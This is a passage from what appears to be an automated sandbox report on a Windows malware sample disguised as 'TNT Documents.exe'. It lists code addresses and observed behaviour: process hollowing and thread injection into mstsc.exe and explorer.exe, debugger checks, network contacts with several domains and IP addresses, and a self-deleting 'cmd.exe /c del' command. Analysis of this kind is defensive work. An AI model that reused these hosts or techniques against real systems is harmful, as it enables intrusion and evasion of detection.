Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C766D mov eax, dword ptr fs:[00000030h] 17_2_055C766D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h] 17_2_055EA61C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA61C mov eax, dword ptr fs:[00000030h] 17_2_055EA61C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566FE3F mov eax, dword ptr fs:[00000030h] 17_2_0566FE3F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h] 17_2_055BC600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h] 17_2_055BC600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC600 mov eax, dword ptr fs:[00000030h] 17_2_055BC600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E8E00 mov eax, dword ptr fs:[00000030h] 17_2_055E8E00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671608 mov eax, dword ptr fs:[00000030h] 17_2_05671608
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BE620 mov eax, dword ptr fs:[00000030h] 17_2_055BE620
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E36CC mov eax, dword ptr fs:[00000030h] 17_2_055E36CC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F8EC7 mov eax, dword ptr fs:[00000030h] 17_2_055F8EC7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566FEC0 mov eax, dword ptr fs:[00000030h] 17_2_0566FEC0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688ED6 mov eax, dword ptr fs:[00000030h] 17_2_05688ED6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E16E0 mov ecx, dword ptr fs:[00000030h] 17_2_055E16E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C76E2 mov eax, dword ptr fs:[00000030h] 17_2_055C76E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056346A7 mov eax, dword ptr fs:[00000030h] 17_2_056346A7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h] 17_2_05680EA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h] 17_2_05680EA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05680EA5 mov eax, dword ptr fs:[00000030h] 17_2_05680EA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564FE87 mov eax, dword ptr fs:[00000030h] 17_2_0564FE87
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h] 17_2_055DB944
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DB944 mov eax, dword ptr fs:[00000030h] 17_2_055DB944
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h] 17_2_055BB171
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB171 mov eax, dword ptr fs:[00000030h] 17_2_055BB171
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BC962 mov eax, dword ptr fs:[00000030h] 17_2_055BC962
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h] 17_2_055B9100
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h] 17_2_055B9100
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9100 mov eax, dword ptr fs:[00000030h] 17_2_055B9100
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E513A mov eax, dword ptr fs:[00000030h] 17_2_055E513A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E513A mov eax, dword ptr fs:[00000030h] 17_2_055E513A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov eax, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D4120 mov ecx, dword ptr fs:[00000030h] 17_2_055D4120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056441E8 mov eax, dword ptr fs:[00000030h] 17_2_056441E8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h] 17_2_055BB1E1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h] 17_2_055BB1E1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BB1E1 mov eax, dword ptr fs:[00000030h] 17_2_055BB1E1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056369A6 mov eax, dword ptr fs:[00000030h] 17_2_056369A6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2990 mov eax, dword ptr fs:[00000030h] 17_2_055E2990
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA185 mov eax, dword ptr fs:[00000030h] 17_2_055EA185
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056351BE mov eax, dword ptr fs:[00000030h] 17_2_056351BE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DC182 mov eax, dword ptr fs:[00000030h] 17_2_055DC182
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h] 17_2_055E61A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E61A0 mov eax, dword ptr fs:[00000030h] 17_2_055E61A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h] 17_2_055D0050
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D0050 mov eax, dword ptr fs:[00000030h] 17_2_055D0050
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05672073 mov eax, dword ptr fs:[00000030h] 17_2_05672073
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05681074 mov eax, dword ptr fs:[00000030h] 17_2_05681074
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E002D mov eax, dword ptr fs:[00000030h] 17_2_055E002D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h] 17_2_05637016
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h] 17_2_05637016
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637016 mov eax, dword ptr fs:[00000030h] 17_2_05637016
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CB02A mov eax, dword ptr fs:[00000030h] 17_2_055CB02A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05684015 mov eax, dword ptr fs:[00000030h] 17_2_05684015
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05684015 mov eax, dword ptr fs:[00000030h] 17_2_05684015
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov ecx, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564B8D0 mov eax, dword ptr fs:[00000030h] 17_2_0564B8D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B58EC mov eax, dword ptr fs:[00000030h] 17_2_055B58EC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B9080 mov eax, dword ptr fs:[00000030h] 17_2_055B9080
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EF0BF mov ecx, dword ptr fs:[00000030h] 17_2_055EF0BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h] 17_2_055EF0BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EF0BF mov eax, dword ptr fs:[00000030h] 17_2_055EF0BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05633884 mov eax, dword ptr fs:[00000030h] 17_2_05633884
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05633884 mov eax, dword ptr fs:[00000030h] 17_2_05633884
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F90AF mov eax, dword ptr fs:[00000030h] 17_2_055F90AF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E20A0 mov eax, dword ptr fs:[00000030h] 17_2_055E20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BF358 mov eax, dword ptr fs:[00000030h] 17_2_055BF358
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BDB40 mov eax, dword ptr fs:[00000030h] 17_2_055BDB40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h] 17_2_055E3B7A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E3B7A mov eax, dword ptr fs:[00000030h] 17_2_055E3B7A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688B58 mov eax, dword ptr fs:[00000030h] 17_2_05688B58
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BDB60 mov ecx, dword ptr fs:[00000030h] 17_2_055BDB60
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567131B mov eax, dword ptr fs:[00000030h] 17_2_0567131B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h] 17_2_056353CA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056353CA mov eax, dword ptr fs:[00000030h] 17_2_056353CA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DDBE9 mov eax, dword ptr fs:[00000030h] 17_2_055DDBE9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E03E2 mov eax, dword ptr fs:[00000030h] 17_2_055E03E2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2397 mov eax, dword ptr fs:[00000030h] 17_2_055E2397
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05685BA5 mov eax, dword ptr fs:[00000030h] 17_2_05685BA5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EB390 mov eax, dword ptr fs:[00000030h] 17_2_055EB390
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h] 17_2_055C1B8F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h] 17_2_055C1B8F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566D380 mov ecx, dword ptr fs:[00000030h] 17_2_0566D380
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567138A mov eax, dword ptr fs:[00000030h] 17_2_0567138A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h] 17_2_055E4BAD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h] 17_2_055E4BAD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h] 17_2_055E4BAD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h] 17_2_0566B260
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h] 17_2_0566B260
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\TNT Documents.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00409B50 LdrLoadDll, 7_2_00409B50
Source: C:\Users\user\Desktop\TNT Documents.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe Network Connect: 51.255.30.106 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 119.18.54.99 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.coached.info
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\TNT Documents.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: EC0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\TNT Documents.exe Memory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread register set: target process: 3292 Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3292 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path} Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe" Jump to behavior
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319293642.0000000005F40000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.336206590.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.314892260.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294735677.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.344277023.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.323053985.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Users\user\Desktop\TNT Documents.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
